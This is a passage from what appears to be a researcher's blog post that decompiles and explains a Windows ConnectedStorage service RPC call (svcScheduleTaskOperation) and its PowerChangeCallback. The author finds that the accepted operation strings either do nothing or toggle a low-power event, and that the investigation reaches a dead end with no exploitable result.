          v19);
      WindowsDeleteString(v26);
      if ( !v25 )
      {
        v31 = 0;
        goto LABEL_11;
      }
      v26 = 0i64;
      v20 = WindowsCreateString(L"logon", 5i64, &v26);
      if ( (v20 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v20,
          (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
          v21);
      v25 = 0;
      v22 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
      if ( (v22 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v22,
          (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
          v23);
      WindowsDeleteString(v26);
      if ( v25 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)0x80070057i64,
          (const wchar_t *)L"Service::ScheduledTaskOperation called with an invalid operation type.",
          v24);
    }
  }
LABEL_12:
  LeaveCriticalSection(v3);
}


 

In short:

  • The expected input strings were “logon”, “standby”, “maintenance”, “testenter” and “testexit”
  • “logon”, “standby” and “maintenance” did nothing! (fake??)
  • “testenter” and “testexit” called the PowerChangeCallback method with a parameter set to GUID_LOW_POWER_EPOCH and a flag set to 1 for “testenter” and 0 for “testexit”. This GUID identifies a “low power state” of the device.
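Condensed into plain C, the dispatch recovered from the decompilation looks roughly like this (the enum and function names are mine; the original works on HSTRINGs via WindowsCompareStringOrdinal and throws on invalid input instead of returning a value):

```c
#include <string.h>

/* Hypothetical condensation of Service::ScheduledTaskOperation:
   three strings are accepted but do nothing, two trigger
   PowerChangeCallback, and anything else yields E_INVALIDARG
   (0x80070057, i.e. the -2147024809 seen earlier). */
typedef enum { OP_NOOP, OP_POWER_ENTER, OP_POWER_EXIT, OP_INVALID } op_result;

op_result schedule_task_operation(const char *arg)
{
    if (!strcmp(arg, "standby") ||
        !strcmp(arg, "maintenance") ||
        !strcmp(arg, "logon"))
        return OP_NOOP;            /* accepted, but no-ops */
    if (!strcmp(arg, "testenter"))
        return OP_POWER_ENTER;     /* PowerChangeCallback, flag = 1 */
    if (!strcmp(arg, "testexit"))
        return OP_POWER_EXIT;      /* PowerChangeCallback, flag = 0 */
    return OP_INVALID;             /* -> 0x80070057 / -2147024809 */
}
```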

The decompiled output of PowerChangeCallback was the following:

__int64 __fastcall ConnectedStorage::Power::PowerChangeCallback(LPCRITICAL_SECTION lpCriticalSection, __int64 a2, __int64 a3)
{
  LPCRITICAL_SECTION v3; // rdi
  int v4; // ebx
  HANDLE v5; // rcx
  __int64 v6; // rdx
  __int64 v7; // r8
  HANDLE v8; // rcx
  DWORD v10; // eax
  const unsigned __int16 *v11; // r8
  ConnectedStorage *v12; // rcx
  DWORD v13; // eax
  const unsigned __int16 *v14; // r8
  ConnectedStorage *v15; // rcx

  v3 = lpCriticalSection;
  v4 = *(_DWORD *)(a3 + 20);
  EnterCriticalSection(lpCriticalSection);
  v5 = v3[1].OwningThread;
  if ( v4 )
  {
    LOBYTE(v3[1].LockSemaphore) = 1;
    if ( !ResetEvent(v5) )
    {
      v13 = GetLastError();
      v15 = (ConnectedStorage *)((unsigned __int16)v13 | 0x80070000);
      if ( (signed int)v13 <= 0 )
        v15 = (ConnectedStorage *)v13;
      ConnectedStorage::ReportErrorAndThrow(v15, L"Event: ResetEvent failed", v14);
    }
    v8 = v3[2].OwningThread;
  }
  else
  {
    LOBYTE(v3[1].LockSemaphore) = 0;
    if ( !SetEvent(v5) )
    {
      v10 = GetLastError();
      v12 = (ConnectedStorage *)((unsigned __int16)v10 | 0x80070000);
      if ( (signed int)v10 <= 0 )
        v12 = (ConnectedStorage *)v10;
      ConnectedStorage::ReportErrorAndThrow(v12, L"Event: SetEvent failed", v11);
    }
    v8 = *(HANDLE *)&v3[3].LockCount;
  }
  if ( v8 )
    (*(void (__fastcall **)(HANDLE, __int64, __int64))(*(_QWORD *)v8 + 8i64))(v8, v6, v7);
  LeaveCriticalSection(v3);
  return 0i64;
}

This function was responsible for resetting (“testenter”) and setting (“testexit”) an event object in order to notify a waiting thread of the occurrence of the particular event (I presume a “low power change” in this case).

So, back to us: what could I do with the original svcScheduleTaskOperation RPC call?

Probably nothing useful; maybe it has been exposed only for testing purposes. Why did MS not implement the other operations, like logon, maintenance and standby?

And why did they call it svcScheduleTaskOperation? Perhaps they will complete it in a future Windows release?

Mystery!

captxbl

As you can see, all the legitimate commands returned 0 (success); that was a cold comfort 😦

My research sadly led to a dead end, but perhaps there are other forgotten or leftover RPC interfaces to look for?

That’s all, for now 🙂

 

 

 
